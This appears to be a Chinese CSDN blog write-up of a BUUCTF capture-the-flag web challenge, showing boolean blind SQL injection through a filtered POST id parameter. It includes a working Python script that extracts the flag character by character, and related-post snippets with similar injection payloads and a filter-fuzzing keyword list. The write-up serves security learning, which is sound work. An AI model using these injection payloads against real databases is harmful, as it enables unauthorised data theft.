【CTF-web】buuctf-[CISCN2019 华北赛区 Day2 Web1]Hack World(sql盲注)

于 2023-08-18 17:33:29 发布
阅读量432 收藏
点赞数 3
分类专栏: ctf 文章标签: 前端 sql 数据库 网络安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sankkl1/article/details/132365891
版权

题目链接

在这里插入图片描述
根据上图可知,页面中已经告诉我们要从flag表中的flag列取出flag,思考是sql注入。经过抓包发现发post包中的id字段是注入点。
经测试当输入id=1时,结果为Hello, glzjin wants a girlfriend.,当id=2时,结果为Do you want to be my girlfriend?
通过SQL注入过滤关键字的Fuzz字典,发现过滤了空格、#等符号。
同时还发现是盲注,即当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果。
根据盲注的方法,尝试输入id=if(1=1,1,2)得到返回了Hello, glzjin wants a girlfriend.,如下图所示。
在这里插入图片描述
由此可以通过if函数来测试flag每一位的值,以下为编写的测试脚本。

import requests
import time

flag = ''
for i in range(1, 50):
    for j in '-{abcdefghijklmnopqrstuvwxyz0123456789}':
        url = "http://eac65d5e-7894-4e1e-835e-3bd9eb2bd74e.node4.buuoj.cn:81/index.php"
        sqls = "if(ascii(substr((select(flag)from(flag)),{},1))={},1,2)".format(i, ord(j))
        data = {"id": sqls}
        c = requests.post(url=url, data=data, timeout=None)
        if 'Hello' in c.text:
            flag += j
            print(flag)
            break
        time.sleep(0.05)

输出结果如下所示:
在这里插入图片描述

Sankkl1
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[CISCN2019 华北赛区 Day2 Web1]Hack World
qi_SJQ_的博客
10-29 270
拿到一道sql注入题思路: 测试过滤:可以bp加字典fuzzing一下,看过滤哪些字符: 找的大佬的fuzzing字典: ` ~ ! @ # $ % ^ & * ( ) - _ = + [ ] { } | \ ; : ' " , . < > / ? -- --+ /**/ && || <> !(<>) and or xor if not select sleep union from where order by concat group b
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
最新发布
m_de_g的博客
04-22 642
【代码】buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
CTF-WEB入门DOC-2019版1
08-03
CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息... 使用场景: ... 其他说明: ...
BUUCTF】[CISCN2019 华北赛区 Day2 Web1]Hack World
aoao331198的博客
04-11 741
明确告诉了flag的位置 输入1 输入其他的基本上都没有错误回显或者信息,采用bool盲注 fuzz一波发现select没有过滤,空格过滤了 1^(ascii(substr((select(flag)from(flag)),1,1))>127) 正常回显,说明方法可行 脚本跑出每一个字符即可 import requests import time url='http://10cb7823-c884-4555-80b8-f586b15e6057.node4.buuoj.cn:81/index..
[CISCN2019 华北赛区 Day2 Web1] web题-Hack World
BROTHERYY的博客
07-08 336
复现环境:buuoj.cn 输入0:Error Occured When Fetch Result. 输入1:Hello, glzjin wants a girlfriend. 输入2:Do you want to be my girlfriend? 输入3:Error Occured When Fetch Result. 题目提示信息说表名和字段名都是flag,给出id就能得到flag 贴出代码 import requests import time import re url='' flag = ''
BUUCTF——[GXYCTF2019]BabySQli
Ho1aAs‘s Blog
05-27 1171
文章目录利用点解题分析完 利用点 SQL字符型注入 UNION SELECT联合查询特性 解题 search.php的注释发现hint <!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5--> 先base32再base64 select * from user where username = '$name' 明白了查询语句,先试试admi
BUUCTF [极客大挑战 2019]FinalSQL
qq_60829702的博客
10-21 1294
因为之前的几道盲注题目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个题目和wp的,但是收获到了很多东西,也希望我能坚持下来。
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 4002
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
网络安全自学笔记:实验吧CTF实战-WEB渗透与隐写术解析
实验吧CTF实战之WEB渗透和隐写术解密1"这个主题涵盖了两个关键知识点:WEB渗透和隐写术。WEB渗透是指通过发现和利用网站应用程序的安全漏洞来获取未经授权的访问或控制权限。而隐写术则是指在图像或其他媒体中隐藏...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值